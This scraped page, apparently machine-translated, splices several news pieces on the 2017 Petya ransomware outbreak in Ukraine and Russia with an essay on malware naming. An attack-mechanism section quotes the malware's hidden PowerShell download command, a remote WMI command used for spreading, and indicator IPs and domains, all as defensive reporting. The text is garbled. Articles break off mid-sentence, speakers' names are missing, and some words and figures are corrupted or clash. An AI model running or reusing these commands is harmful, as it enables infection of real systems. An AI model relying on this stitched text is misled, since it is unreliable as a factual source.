rockfanatics.ru → System

Malware “Petya” and “Misha”: what is happening and what to do in three words? Who is behind the massive infection of Ukraine Check for the possible presence of residual components of the Petya and Mischa ransomware.

On Tuesday, June 27, Ukrainian and Russian companies reported a massive virus attack: computers at enterprises displayed a ransom message. I figured out who once again suffered because of hackers and how to protect yourself from theft of important data.

Petya, that's enough

The energy sector was the first to be attacked: Ukrainian companies Ukrenergo and Kyivenergo complained about the virus. The attackers paralyzed their computer systems, but this did not affect the stability of the power plants.

Ukrainians began to publish the consequences of the infection online: judging by numerous pictures, computers were attacked by a ransomware virus. A message popped up on the screen of the affected devices stating that all data was encrypted and device owners needed to pay a $300 ransom in Bitcoin. However, the hackers did not say what would happen to the information in case of inaction, and did not even set a countdown timer until the data was destroyed, as was the case with the WannaCry virus attack.

The National Bank of Ukraine (NBU) reported that the work of several banks was partially paralyzed due to the virus. According to Ukrainian media, the attack affected the offices of Oschadbank, Ukrsotsbank, Ukrgasbank, and PrivatBank.

The computer networks of Ukrtelecom, Boryspil Airport, Ukrposhta, Nova Poshta, Kievvodokanal and the Kyiv Metro were infected. In addition, the virus hit Ukrainian mobile operators - Kyivstar, Vodafone and Lifecell.

Later, Ukrainian media clarified that we are talking about the Petya.A malware. It is distributed according to the usual scheme for hackers: victims are sent phishing emails from dummies asking them to open an attached link. After this, the virus penetrates the computer, encrypts the files and demands a ransom for decrypting them.

The hackers indicated the number of their Bitcoin wallet to which the money should be transferred. Judging by the transaction information, the victims have already transferred 1.2 bitcoins (more than 168 thousand rubles).

According to information security specialists from Group-IB, more than 80 companies were affected by the attack. The head of their crime lab noted that the virus is not related to WannaCry. To fix the problem, he advised closing TCP ports 1024–1035, 135 and 445.

Who is guilty

She hastened to assume that the attack was organized from the territory of Russia or Donbass, but did not provide any evidence. Minister of Infrastructure of Ukraine saw clue in the word “virus” and wrote on his Facebook that “it’s no coincidence that it ends in RUS,” adding a winking emoticon to his guess.

Meanwhile, he claims that the attack is in no way connected with existing “malware” known as Petya and Mischa. Security experts claim that the new wave has affected not only Ukrainian and Russian companies, but also enterprises in other countries.

However, the interface of the current “malware” resembles the well-known Petya virus, which was distributed through phishing links a few years ago. At the end of December, an unknown hacker responsible for creating the Petya and Mischa ransomware began sending infected emails with an attached virus called GoldenEye, which was identical to previous versions of the ransomware.

The attachment to the regular letter, which HR department employees often received, contained information about the fake candidate. In one of the files one could actually find a resume, and in the next one - the virus installer. Then the main targets of the attacker were companies in Germany. Over the course of 24 hours, more than 160 employees of the German company fell into the trap.

It was not possible to identify the hacker, but it is obvious that he is a Bond fan. The Petya and Mischa programs are the names of the Russian satellites “Petya” and “Misha” from the film “Golden Eye”, which in the plot were electromagnetic weapons.

The original version of Petya began to be actively distributed in April 2016. It skillfully camouflaged itself on computers and posed as legitimate programs, requesting extended administrator rights. After activation, the program behaved extremely aggressively: it set a strict deadline for paying the ransom, demanding 1.3 bitcoins, and after the deadline, it doubled the monetary compensation.

However, then one of the Twitter users quickly found the weaknesses of the ransomware and created a simple program that, in seven seconds, generated a key that allowed you to unlock the computer and decrypt all the data without any consequences.

Not for the first time

In mid-May, computers around the world were attacked by a similar ransomware virus, WannaCrypt0r 2.0, also known as WannaCry. In just a few hours, it paralyzed hundreds of thousands of Windows devices in more than 70 countries. Among the victims were Russian security forces, banks and mobile operators. Once on the victim’s computer, the virus encrypted the hard drive and demanded that the attackers send $300 in bitcoins. Three days were allotted for reflection, after which the amount was doubled, and after a week the files were encrypted forever.

However, the victims were in no hurry to pay the ransom, and the creators of the malware

Illustration copyright PA Image caption According to experts, fighting the new ransomware is more difficult than WannaCry

On June 27, ransomware locked computers and encrypted files at dozens of companies around the world.

It is reported that Ukrainian companies suffered the most - the virus infected the computers of large companies, government agencies and infrastructure facilities.

The virus demands $300 in Bitcoin from victims to decrypt files.

The BBC Russian service answers the main questions about the new threat.

Who was hurt?

The spread of the virus began in Ukraine. The Boryspil airport, some regional divisions of Ukrenergo, chain stores, banks, media and telecommunications companies were affected. Computers in the Ukrainian government also went down.

Following this, it was the turn of companies in Russia: Rosneft, Bashneft, Mondelеz International, Mars, Nivea and others also became victims of the virus.

How does the virus work?

Experts have not yet reached a consensus on the origin of the new virus. Group-IB and Positive Technologies see it as a variant of the 2016 Petya virus.

“This ransomware uses both hacker methods and utilities, as well as standard system administration utilities,” comments Elmar Nabigaev, head of the information security threat response department at Positive Technologies. “All this guarantees a high speed of spread within the network and the massiveness of the epidemic as a whole (if infected at least one personal computer). The result is complete computer inoperability and data encryption."

The Romanian company Bitdefender sees more in common with the GoldenEye virus, in which Petya is combined with another malware called Misha. The advantage of the latter is that it does not require administrator rights from the future victim to encrypt files, but extracts them independently.

Brian Cambell from Fujitsu and a number of other experts believe that the new virus uses a modified EternalBlue program stolen from the US National Security Agency.

After the publication of this program by hackers The Shadow Brokers in April 2017, the WannaCry ransomware virus created on its basis spread all over the world.

Using Windows vulnerabilities, this program allows the virus to spread to computers throughout the corporate network. The original Petya was sent by email under the guise of a resume and could only infect the computer where the resume was opened.

Kaspersky Lab told Interfax that the ransomware virus does not belong to previously known families of malicious software.

“Kaspersky Lab software products detect this malware as UDS:DangeroundObject.Multi.Generic,” noted Vyacheslav Zakorzhevsky, head of the anti-virus research department at Kaspersky Lab.

In general, if you call the new virus by its Russian name, you need to keep in mind that in appearance it looks more like Frankenstein’s monster, since it is assembled from several malicious programs. It is known for certain that the virus was born on June 18, 2017.

Image caption The virus demands $300 to decrypt files and unlock your computer.

Cooler than WannaCry?

It took WannaCry just a few days in May 2017 to become the largest cyberattack of its kind in history. Will the new ransomware virus surpass its recent predecessor?

In less than a day, the attackers received 2.1 bitcoins from their victims - about 5 thousand dollars. WannaCry collected 7 bitcoins during the same period.

At the same time, according to Elmar Nabigaev from Positive Technologies, it is more difficult to fight the new ransomware.

“In addition to exploiting [the Windows vulnerability], this threat is also spread through operating system accounts stolen using special hacking tools,” the expert noted.

How to fight the virus?

As a preventative measure, experts advise installing updates for operating systems on time and checking files received by email.

Advanced administrators are advised to temporarily disable the Server Message Block (SMB) network transfer protocol.

If your computers are infected, under no circumstances should you pay the attackers. There is no guarantee that once they receive payment, they will decrypt the files rather than demand more.

All that remains is to wait for the decryption program: in the case of WannaCry, it took Adrien Guinier, a specialist from the French company Quarkslab, a week to create it.

The first AIDS ransomware (PC Cyborg) was written by biologist Joseph Popp in 1989. She hid directories and encrypted files, demanding payment of $189 for" license Renewal" to an account in Panama. Popp distributed his brainchild using floppy disks by regular mail, making a total of about 20 thousandyachshipments. Popp was detained while trying to cash a check, but avoided trial - in 1991 he was declared insane.

There is a new ransomware virus epidemic on the Internet. The malware practically blocked the work of dozens of large companies, demanding just under $400 for decrypting the hard drive of each workstation.

The panic generated by the new epidemic created information chaos: first, anti-virus analysts announced the second coming of WannaCry, then the malware was identified as a complex of newly assembled encryption viruses “Petya” and “Misha”. At this point, it is clear that if the virus was based on Petya, it was heavily modified.

The distribution model is partly similar to WannaCry - an exploit for the MS17-010 vulnerability is used, which was enhanced by social engineering using a vulnerability in MS Word. Infection occurs after a user opens an email attachment or downloads a file that exploits the CVE-2017-0199 vulnerability published in April 2017. And distribution to other computers on the network is already ensured by a whole set of techniques:

stealing user passwords or using active sessions to access other network nodes (Mimikatz utility code is used).
through a vulnerability in SMB (CVE-2017-0144, MS17-010) - using the same famous EthernalBlue exploit that was successfully used in WannaCry.

The malware uses stolen accounts to copy its body into admin$ shares and launches them using the legitimate PsExec utility, which is used to remotely control a computer.

Developer of a famous program Mimikatz, confirmed that its modified code is used to extract passwords.

Code for using the WMI interface to run the installation was also published on the Microsoft blog.

Infection via the SMB vector uses the CVE-2017-0144 vulnerability, similar to the technique used in WannaCry.

But the encryption model has changed significantly compared to WannaCry. The virus, penetrating the computer, infects the MBR (master boot record) of the system and encrypts the first few blocks of the hard drive, including the Master File Table, making the entire hard drive of the user inaccessible, and not just individual files, as ransomware viruses usually do.

It’s definitely not worth paying a ransom to extortionists, and not only for ethical reasons: virus analysts have come to the conclusion that decrypting files after paying a ransom is in principle impossible. This function is simply not included in the malware. In fact, this is not an epidemic of ransomware, but an epidemic of a wiper virus that destroys data.

According to media reports in Russia, the greatest problems were encountered in the Rosneft corporation; the main websites of the corporation and the Bashneft website were disabled for a long time.

Massive infections have been recorded in France, Spain, Russia, and CIS countries. In Ukraine, dozens of government and commercial organizations have been affected by the virus.

Who needs it?

Since the recovery mechanism was not included in the code, there are three possible options for motivating attackers. Either they wanted to disguise the targeted destruction of someone’s specific data as a mass epidemic, or they wanted to make money without initially intending to restore anything. The least likely option is cyber vandalism. A virus is a serious product, and it would be wiser to spend the effort to create it on something that brings in money. Vandals were common in the 1990s, when it was fashionable to break systems for fame, but they are now extremely rare.

As a result, the main beneficiaries of the epidemics of the last 2 months were, apparently, the group The Shadow Brokers, which distributed the EthernalBlue exploit. The extortionists themselves collected relatively small amounts of money, several orders of magnitude less than the amount of damage caused by the epidemic. The epidemics have become excellent advertising for The Shadow Brokers, who claim that they are ready to sell information about other exploits from the NSA archive. After all, EthernalBlue is just one exploit out of dozens stolen from the Secret Service in August 2016.

Attack Mechanism

An attacker can send files or links to them (at the initial stage of the epidemic these were the files Petya.apx, myguy.exe, myguy.xls, Order-[any date].doc), through which a workstation running Windows is infected. For example, when opening the file Order-[any date].doc, the server 84.200.16.242 is contacted on port 80 and xls is downloaded:

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe");" (PID: [process id], Additional Context: (System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\[random number].exe") ;)

The malware then tries to connect to servers 111.90.139.247:80 and COFFEINOFFICE.XYZ:80, which are possibly command and control servers.

Indicators of compromise are the presence of files:

C:\Windows\perfc.dat
C:\myguy.xls.hta

After attaching to the host, it scans other Windows machines on the network and spreads using the vulnerabilities described in MS17-010 (the same ones that WannaCry used) on ports tcp:135, tcp:139, tcp:445, tcp:1024-1035.

Distribution can also occur by executing the command:

Remote WMI, “process call create "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\" #1"

The infection spread diagram is taken from blog.kryptoslogic.com

How to avoid infection?

french-cooking.com:80
84.200.16.242:80
111.90.139.247:80
COFFEINOFFICE.XYZ:80

Petya.apx, myguy.exe, myguy.xls, Order-[any date].doc

3. Install patches

4. Configure IPS to block exploits for MS17-010

5. To protect hosts that have not yet been infected, you can create a file c:\windows\perfc without an extension. Such nodes are not infected.

A brief excursion into the history of malware naming.

To bookmarks

Petya.A virus logo

On June 27, at least 80 Russian and Ukrainian companies were attacked by the Petya.A virus. The program blocked information on the computers of departments and enterprises and, like the well-known ransomware virus, demanded bitcoins from users.

Malicious programs are usually named by employees of antivirus companies. The exceptions are those encryptors, ransomware, destroyers and identity thieves, which, in addition to computer infections, cause media epidemics - increased hype in the media and active discussion on the network.

However, the Petya.A virus is a representative of a new generation. The name by which he introduces himself is part of the developers’ marketing strategy aimed at increasing his recognition and popularity on the darknet market.

Subcultural phenomenon

At a time when there were few computers and not all of them were connected to each other, self-propagating programs (not yet viruses) already existed. One of the first of these was , which jokingly greeted the user and offered to catch him and delete him. Next up was Cookie Monster, who demanded to “give him a cookie” by entering the word “cookie.”

Early malware also had a sense of humor, although it wasn't always in their names. Thus, Richard Scrant, designed for the Apple-2 computer, read a poem to the victim once every 50 computer startups, and the names of the viruses, often hidden in the code and not displayed, referred to jokes and subcultural words common among geeks of that time. They could be associated with metal band names, popular literature, and tabletop role-playing games.

At the end of the 20th century, the creators of viruses did not hide much - moreover, often, when a program got out of control, they tried to take part in eliminating the harm caused to it. This was the case with the Pakistani and destructive one, created by the future co-founder of the Y-Combinator business incubator.

One of the Russian viruses mentioned by Evgeniy Kaspersky in his 1992 book “Computer Viruses in MS-DOS” also demonstrated poetic abilities. The Condom-1581 program from time to time showed the victim a program dedicated to the problems of clogging the world's oceans with human waste products.

Geography and calendar

In 1987, the Jerusalem virus, also known as the Israeli Virus, was named after the place where it was first discovered, and its alternative name Black Friday was due to the fact that it would activate and delete executable files if the 13th of the month fell on a Friday.

The Michelangelo virus, which caused panic in the media in the spring of 1992, was also named according to the calendar principle. Then John McAfee, later famous for creating one of the most intrusive antiviruses, during a Sydney cybersecurity conference, told journalists and the public: “If you boot an infected system on March 6, all the data on the hard drive will be corrupted.” What does Michelangelo have to do with this? March 6 was the Italian artist’s birthday. However, the horrors that McAfee predicted ended up being wildly exaggerated.

Functionality

The capabilities of the virus and its specificity often serve as the basis for the name. In 1990, one of the first polymorphic viruses was named Chameleon, and it, which has extensive capabilities to hide its presence (and therefore belongs to the category of stealth viruses), was named Frodo, hinting at the hero of “The Lord of the Rings” and the Ring hiding from the eyes of others . And, for example, the OneHalf virus of 1994 got its name due to the fact that it showed aggression only by infecting half of the disk of the attacked device.

Service titles

Most viruses have long been named in laboratories, where they are analyzed into parts by analysts.

Usually these are boring serial names and general “family” names that describe the category of the virus, what systems it attacks and what it does with them (like Win32.HLLP.DeTroie). However, sometimes, when hints left by the developers are revealed in the program code, viruses gain a little personality. This is how, for example, the MyDoom and KooKoo viruses appeared.

However, this rule does not always work - for example, the Stuxnet virus, which stopped uranium enrichment centrifuges in Iran, was not called Myrtus, although this word (“myrtle”) in the code was almost a direct hint at the participation of Israeli intelligence services in its development. In this case, the name that had already become known to the general public, assigned to the virus in the first stages of its discovery, won.

Tasks

It often happens that viruses that require a lot of attention and effort to study receive beautiful names from antivirus companies that are easier to say and write down - this happened with Red October, diplomatic correspondence and data that could affect international relations, as well as with IceFog , large-scale industrial espionage.

File extension

Another popular way of naming is by the extension that the virus assigns to infected files. Thus, one of the “military” viruses, Duqu, was named so not because of Count Dooku from Star Wars, but because of the ~DQ prefix, which marked the files it created.

The WannaCry virus, which made a splash this spring, also got its name, marking the data encrypted by it with the .wncry extension.

The earlier name of the virus, Wanna Decrypt0r, did not catch on - it sounded worse and had different spellings. Not everyone bothered to put "0" as an "o".

“You have become a victim of the Petya ransomware virus”

This is exactly how the most talked about malware today introduces itself after it has completed encrypting files on the attacked computer. The Petya A. virus not only has a recognizable name, but also a logo in the form of a pirate skull and crossbones, and a whole marketing promotion. Spotted together with its brother “Misha”, the virus attracted the attention of analysts precisely because of this.

From a subcultural phenomenon, having gone through a period when this kind of “hacking” required quite serious technical knowledge, viruses turned into a weapon of a cyber-gop-stop. Now they have to play by market rules - and whoever gets more attention brings big profits to their developers.